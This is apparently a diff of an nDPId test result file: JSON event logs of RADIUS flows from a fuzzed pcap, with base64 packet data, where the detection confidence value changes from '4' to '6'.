00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1528998285403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998285403,"pkt":"ABRP+4rqcNuYVcUnCABFAAClDBBAAPwRR\/bG4hk1DgxAHg8UchAAkVlTC5wAid6Vm2Prh8ff1igjujrPQY0BNTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWPjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmELODcvNWM6MWQ6ZDk6NTM6MGM6OWIvMjM5Tw4BAAAMFwwAAAwBf\/xQEvWoCrn3KdnMpOYKRlABwJ8="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":293,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528998285592} 
@@ -370,17 +370,17 @@ 00574{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":294,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1528997663992,"flow_last_seen":1528997989461,"flow_idle_time":620000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":711,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":400,"midstream":0,"thread_ts_msec":1528998285529,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998307737,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1528998307737,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998307737,"pkt":"ABRP+4rqcNuYVcUnCABFAADhDH5AAPsRSEzGBwk1CgxAHgcUchAAzRApC54AxbiGAVeQd4nw9IQcbiUA5zoBNTAzMTM0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM3T0oBAnZIFwEAAAEFAAD4l2tdy6yk\/88l9cpE8l40DAUAACRoRug2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998307737,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998307737,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998308061,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1528998308061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528998308061,"pkt":"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"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998308061,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998308061,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":297,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":16640,"global_ts_msec":1528998308249} 
00713{"packet_event_id":1,"packet_event_name":"packet","packet_id":297,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":16640,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998308061,"pkt":"ABRP+4rqcNu2VcUnQQBFAAEwDINAAPsRR\/jG4hk1CgwlAAcUchABHKZIAp8BFMKP3L7bmNggOPWkTIavpgoaCwAAV8gbBVNQQxpuAAABNxA0723Z5fHoC0l+gadvadgzfaSzCz27rPwxopk71TEDK1VIm8mW\/vsFxUsHy2TxysAjZO8RNM3E07NOswLZR1Yjduj2RuApthb0mlkqWQZZpjfg4Vd1eYt2TqpojJTwm8thaNHCskFYATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLiUAYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhOTUyL2YwOjc5OlAwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFeVBDTwYDAgAEUBIoTJCJ2HxVvdUlAOn56UH9"} 00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":298,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528998308483} 01284{"packet_event_id":1,"packet_event_name":"packet","packet_id":298,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528998308061,"pkt":"AAAMB6xAABRP+4rqCAAkAALbIVBAAP8RAAAKDEAexuIZNXIQBxQCxwAAAaACv\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\/Jw=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998314309,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1528998314309,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998314309,"pkt":"ABRP+4pIcNuYVcUnCABFAAClDKJAAPwRR2TG4hk1ClFAHgcUchAAkVZiC6QAiXXtUkUY2UEpsUhCUrecX98BNTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5YTQvNWM6MWQ6ZDk6NTM6MGM6OWIvMjQwTw4BAAAMFwwAAAwBf\/xQEi8FyNCyWjoJnDm8uRInVVc="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998314309,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998314309,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314512,"flow_last_seen":1528998314512,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528998314512,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":43028,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1528998314512,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528998314512,"pkt":"ABRP+4rqcNuYVcUnCABFAADADKZAAPwRR0XG4hk1CgxAHqgUchAArLr7A6UApAJ1Pjz8JGCwuo5GIgtQcZwBNTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm5yZywgNWIyMmE5YTQvNWM6MWQ6ZDk6QjM6MGM6OWIvMjQwEiIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92a3Npa25lZE8HBAEABwBQEil3cnDy8\/cVSnBQY7FdIyI="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":312,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528998315379} 
@@ -395,7 +395,7 @@ 01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":318,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528998323340,"pkt":"AAAMB6xAABRP+4rqCABFAALbIVpEAP8RAAAKDEAexuIZNXIQBxQCxwAAAaoCv2Uj1+ujspK2VyIvdisE+iUaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998338382,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1528998338382,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998338382,"pkt":"ABQlAIrqcNuYVcUnCABFAADhDOxAAPwRRt7G4hk1CgxASQcUchAAzQ2+C6oAxV4x6AhgYl+1t\/7aBLDTkJgBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Y6MzcvMjM3T0oBAgBIFwEAAAEFAAD9ndZ8FHhsyj5jhEswY1t0AgUAABpKKGv5SQAALFBpvDseP8KLAQACCwUAAC1HLAQoI0jpYeW4fPFsl+tQEgCJjyegSbpAOXlBuPG4l8E="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998338382,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998338382,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":321,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528998338865} 00713{"packet_event_id":1,"packet_event_name":"packet","packet_id":321,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998338669,"pkt":"ABRP+4rq8NuYVcUnCABFAAEwDPCkAPwRRos14hk1CgxAHgcUchABHImMAqsBFPNe2aGl6LP5y1u\/scR1o3AaCwAAV8gbBVNQOBpuAAABNxA0yJ0HwRo2kUg5GkMLWv3LIW9bZ\/+pjZx0CoGr7LPlqjfgOPOLXgeADm9RiTIaXTD+uAsRNK2vP2ZsGXahxC9sjBUhoGJOMJlzjqJyAyTjvpVvse28Qg5S9JgwmD8p+ZaQYnYBaM5xATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0JQByay5vcmcsIDViMjJhOTUyL2YwOjc5OjYwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBIrffGqrk1JHmvfqoB\/bRcD"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":322,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711,"global_ts_msec":1528998342492} 
@@ -404,42 +404,42 @@ 01254{"packet_event_id":1,"packet_event_name":"packet","packet_id":324,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528998342683,"pkt":"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"} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998346991,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1528998346991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998346991,"pkt":"ABRP+4rqcNuTVcUnCABFAADhDRdAAPwRRrPG4hk1CgxAHgcUchgAzQnPC64AxTy6++0fAX35UVXUpCEgeNcBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjAlADk6QTA6ZCUAN2Q6MzcvMjM3T0oBAgBIFwEAAAEFAAB+LhDHIi3oCVbmy0rSchdaAgUAAJdIOUyErgAA73piWKcgvT+LAQACCwUAAEZfsVUxfYxGJMfW\/6iCQHdQEgwvQS2NfxbBCfFadP4Rx2E="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998346991,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998346991,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998347284,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1528998347284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528998347284,"pkt":"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"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998347284,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998347284,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":329,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528998347461} 
00711{"packet_event_id":1,"packet_event_name":"packet","packet_id":329,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998347284,"pkt":"ABRP+4rqcNuYVcUnqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
